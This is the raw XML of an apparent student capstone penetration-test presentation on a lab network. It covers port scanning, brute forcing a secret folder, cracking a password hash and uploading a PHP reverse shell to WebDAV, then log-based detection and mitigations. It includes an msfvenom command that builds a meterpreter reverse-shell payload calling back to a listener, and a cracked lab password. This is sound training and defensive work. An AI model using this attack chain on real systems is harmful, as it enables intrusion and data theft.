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5" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="282" r:id="rId13"/>
    <p:sldId id="281" r:id="rId14"/>
    <p:sldId id="280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Thin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8CD490-5B94-4BB8-A7B6-E16A17AA941E}">
  <a:tblStyle styleId="{118CD490-5B94-4BB8-A7B6-E16A17AA94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120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126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48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811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There were vulnerabilities uncovered when uploading a php payload to establish a reverse shell in the network.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There were vulnerabilities uncovered when uploading a php payload to establish a reverse shell in the network.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13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ackstation.ne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-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2015-8562</a:t>
            </a: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placed the PHP reverse shell on the WebDAV and activated it. This created a successful PHP reverse shell and we were able to gain access to the system and exfiltrate valuable data.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Gained access to the server, via Meterpreter session. Successfully exfiltrated data.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86C64-11F6-4921-8FE2-DC5BC079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53" y="1754815"/>
            <a:ext cx="1963082" cy="8169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CVE-2012-1823</a:t>
            </a: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Utilize msfvenom on the Kali machine to craft a PHP reverse shell payload. We then used Metasplopit to setup a listener before deploying the reverse shell.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Utilize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on the Kali machine to craft a PHP reverse shell payload. We then used Metasploit to setup a listener before deploying the reverse shell.</a:t>
            </a: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msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php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-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LFI vulnerability</a:t>
            </a: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deliver a payload onto the vulnerable machine (the capstone server)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39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multi/handler exploit I could get access to the machine’s shell.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4235278" y="265374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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="14720878">
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="45719" cy="6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BC15773-3437-4BE6-856B-E365FFD7A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22" y="3285411"/>
            <a:ext cx="4793578" cy="17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7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Exploitation: [Hashed Passwords]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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 used the website crackstation.net to crack the hashed password.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password ‘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linux4u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’ was used in conjunction with username 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Ryan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access the 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US" sz="12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webdav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folder.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BE6DF-7BA2-448A-BD35-523F88BB4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15" y="1548229"/>
            <a:ext cx="2425759" cy="31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-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port 80 Open to Public Access</a:t>
            </a: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scan for open ports on the target machine.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39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Nmap scanned 256 IP addresses: I found 4 hosts up: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Port 22 and 80 was of interest to me.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[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75840-DB40-4B07-AE47-2CF51569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382550"/>
            <a:ext cx="3135805" cy="32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9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15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520974" y="742742"/>
            <a:ext cx="6828949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port scan started on July 1, 2021 at approximately  21:00hrs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18,202 connections occurred at the peak, the source IP was 192.168.1.90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 The sudden peaks in network traffic indicate that this was a port scan. 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75" y="89736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2FC4B4E-2109-4AD8-9E74-23FFEEE26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90844"/>
            <a:ext cx="8496698" cy="31946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734654" y="741299"/>
            <a:ext cx="5978661" cy="1269599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request started at 2100hrs on  July  1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> 2020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14,355 requests were made to access the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>contained a hash that I could use to access the system using another employee’s credentials (Ryan)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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>also allowed me to upload a payload, thus exploiting other vulnerabilities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04" y="867163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A8CD55-40A3-41A8-AF97-4AACCC40C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2071438"/>
            <a:ext cx="8409300" cy="25340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13010" y="675975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109,843 requests were made in the attack to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>.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2 attacks were successful. 100% of these attacks returned a 301 HTTP status code “Moved Permanently”.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31" y="725574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2C3727-F7A2-42E1-9496-500FD00C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836" y="1535494"/>
            <a:ext cx="5664120" cy="33248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959884" y="900461"/>
            <a:ext cx="5791200" cy="960646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96 requests were made to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>directory.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primary requests were for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>passwd.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>files.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00" y="900461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99A2E3-7B95-4F1B-B75F-E0AE7DDF5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" y="1619287"/>
            <a:ext cx="6060613" cy="3176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20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Threshold for multiple ports coming from a single origin in a short amount of time.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10 port scans in one minute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100 consecutive ICMP requests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Font typeface="Roboto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Enable only the traffic internal hosts need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Deny everything else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1AD35-251B-4682-B321-19BC4663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010" y="2757730"/>
            <a:ext cx="2804403" cy="1896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Deny all unauthorized IPs access to shared files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Disable directory listing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Don’t use robots.txt to exclude any information, this is the first source for hackers where to look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Rename folders containing sensitive/private/company critical data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Encrypt data contained within confidential folders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Review IP addresses that cause an alert to be sent: either whitelist or block the IP addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" baseline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●Alert when 20+ failed login attempts in 1 minute.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●PHP brute force attack detector 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●Detect source IPs exceeding thresholds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●Detect accounts that have 10 lockouts in a 10-minute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●Using MFA for WebDAV login.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●Use a USB security key for Multi factor.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●Lockout accounts after 3 failed attempts in 30 minutes and lock down account that requires admin intervention with 10 failed logins over 4 hours.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●No root access over SSH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●Implement file server auditors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●Alerts on HTTP POST and GET requests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●Enable traversal signatures to security policy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●Restrict connections to the shared folder with a firewall rule.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●No robots.txt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●Don’t save PII in files and have your co worker log you in every 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●Limit outgoing connections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●Disable tools not needed to make it more difficult to establish a reverse shell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●Use application aware host or client-based firewalls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●Limit the types of files that can be uploaded remotely.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●No root SSH access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●Restrict access on local machines so email attachments or unauthorized programs get installed on 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 dirty="0"/>
              <a:t>[Insert Here]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draw.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> a diagram of the network.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 your diagram to this slide and fill out the data in the sidebar.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 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Hyper-V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 (Attack Machine)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Ubuntu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Capstone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18.04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4FACC-3911-40D9-8F48-2D3B4B4E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75" y="942409"/>
            <a:ext cx="6699600" cy="38656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2257410188"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198751"/>
          <a:ext cx="8346600" cy="3745554"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{118CD490-5B94-4BB8-A7B6-E16A17AA941E}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0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5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– Hosts all the VM’s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2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Attacking Machine - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" baseline="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Pentesting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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Environment containing Metasploit and other tools to launch exploits</a:t>
                      </a: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5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– Machine being attacked from Kali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5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Kibana- Log gathering utilizing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Packetbeat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and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Metricbeat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0" y="4910413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4060066367"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="358815" y="1040775"/>
          <a:ext cx="8394435" cy="3706012"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{118CD490-5B94-4BB8-A7B6-E16A17AA941E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2819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CVE-2012-1823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Vulnerability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remote attackers to execute arbitrary code by exploiting vulnerabilities in the query string.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5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CVE-2015-8562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Joomla Vulnerability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attackers to conduct PHP object injection attacks and execute arbitrary PHP code via HTTP User-Agent header.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CVE-2012-2311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Vulnerability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remote attackers to execute arbitrary code. This vulnerability exists because of an incomplete fix for CVE-2012-1823.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vulnerable machine.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credentials. The attacker can read (and sometimes execute) files on the vulnerable machine.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0" y="4910413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706374083"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="390750" y="1040776"/>
          <a:ext cx="8174517" cy="3718410"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{118CD490-5B94-4BB8-A7B6-E16A17AA941E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2724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4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1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Passwords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a password is not salted it can be cracked via online tools such as </a:t>
                      </a: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www.crackstation.net</a:t>
                      </a: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programs such as </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" i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hashcat</a:t>
                      </a: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the password is cracked, and if a user name is already known, a hacker can access system files.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68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Commonly used passwords such as simple words, and the lack of password complexity, such as the inclusion of symbols, numbers and capitals.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access could be discovered by social engineering. https://thycotic.com/resources/password-strength-checker/suggests that ‘Leopoldo’ could be cracked in 21 seconds by a computer.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581">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="1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Port 80 open with public access</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="1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CVE-2019-6579</a:t>
                      </a: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and unsecured access to anyone attempting entry using Port 80.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Files and Folders are readily accessible. Sensitive (and secret) files and folders can be found.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2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69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[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CVE-2012-2311</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>]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Nmap scan revealed port 80 was open and running a vulnerable web server. A Hydra brute force attack on a secret folder revealed private information that allowed us to pivot to a WebDAV server utilizing compromised credentials.</a:t>
            </a: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Gained entry to secret folder and gained information about a point of entry into the system we could use to deliver our PHP reverse shell payload.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Google Shape;1107;p61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFB0230-7AF5-4C5E-AC9B-EF6D470744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234" y="1717050"/>
            <a:ext cx="2287375" cy="67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1460</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>225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Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light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Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: [CVE-2012-2311]</vt:lpstr>
      <vt:lpstr>Exploitation: [CVE-2015-8562]</vt:lpstr>
      <vt:lpstr>Exploitation: [CVE-2012-1823]</vt:lpstr>
      <vt:lpstr>Exploitation: [LFI vulnerability]</vt:lpstr>
      <vt:lpstr>Exploitation: [Hashed Passwords]</vt:lpstr>
      <vt:lpstr>Exploitation: [Port 80 Open to Public Access]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User</dc:creator>
  <cp:lastModifiedBy>dana stewart</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-14T19:09:30Z</dcterms:modified>
</cp:coreProperties>
</file>